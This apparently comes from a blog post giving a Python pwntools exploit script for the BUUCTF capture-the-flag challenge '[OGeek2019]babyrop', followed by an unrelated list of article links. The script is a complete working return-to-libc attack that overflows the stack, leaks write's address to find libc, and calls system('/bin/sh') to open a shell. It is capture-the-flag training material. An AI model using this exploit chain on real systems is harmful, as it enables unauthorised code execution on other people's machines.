buuctf@[OGeek2019]babyrop
2024-09-05 13:29:32
#!/usr/bin/python
#coding:utf-8
from pwn import *
#context.log_level = 'debug'
io = process('./pwn',env={"LD_PRELOAD":"./libc-2.23.so"})
#io = remote('node1.buuoj.cn', 28034)
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')
def debug():
global io
addr = raw_input("[+]debug:")
gdb.attach(io, "b *"+addr)
'''
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
'''
write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
main_addr = 0x08048825
bin_sh_offset = 0x15902b # by libc-database
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")
offset = 0xE7
payload = 'A'*(offset+4)
payload += p32(write_plt_addr)
payload += p32(main_addr)
payload += p32(1)
payload += p32(write_got_addr)
payload += p32(4)
io.sendline(payload)
data = io.recv(4)
write_addr = u32(data)
print "[+]write_addr:",hex(write_addr)
libc_base_addr = write_addr - libc.symbols['write']
print "[+]libc_base_addr:",hex(libc_base_addr)
system_addr = libc_base_addr + libc.symbols['system']
print "[+]system_addr:",hex(system_addr)
bin_sh_addr = libc_base_addr + bin_sh_offset
print "[+]bin_sh_addr:",hex(bin_sh_addr)
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")
payload = 'A'*(offset+4)
payload += p32(system_addr)
payload += 'AAAA'
payload += p32(bin_sh_addr)
#debug()
#pause()
io.sendline(payload)
io.interactive()
最新文章
- SSH框架使用中存在的诡异异常
- sql统计重复数据
- 压缩UI深度的代码实现
- 利用DIV,实现简单的网页布局
- spring 源码之IOC 类图
- SQL Server 2008备份数据库失败,拒绝访问的原因
- Xposed 学习笔记
- MP4文件格式的解析
- 在Anacoda中管理多个版本Python
- MySQL InnoDB 修改表列Online DDL
- Java中方法定义和调用的学习
- Note for "Some Remarks on Writing Mathematical Proofs"
- C++ 获取字符串中的所有汉字
- centos目录
- bzoj4176. Lucas的数论 杜教筛
- EF5+MVC4系列(9) Razor视图引擎的核心原理;@符号的使用;输出html的转义
- 内核线程和用户线程(SMP)
- 【洛谷 P2042】 [NOI2005]维护数列(自闭记第一期)
- [转]Spring Security学习总结二
- Linux基础命令-文件与目录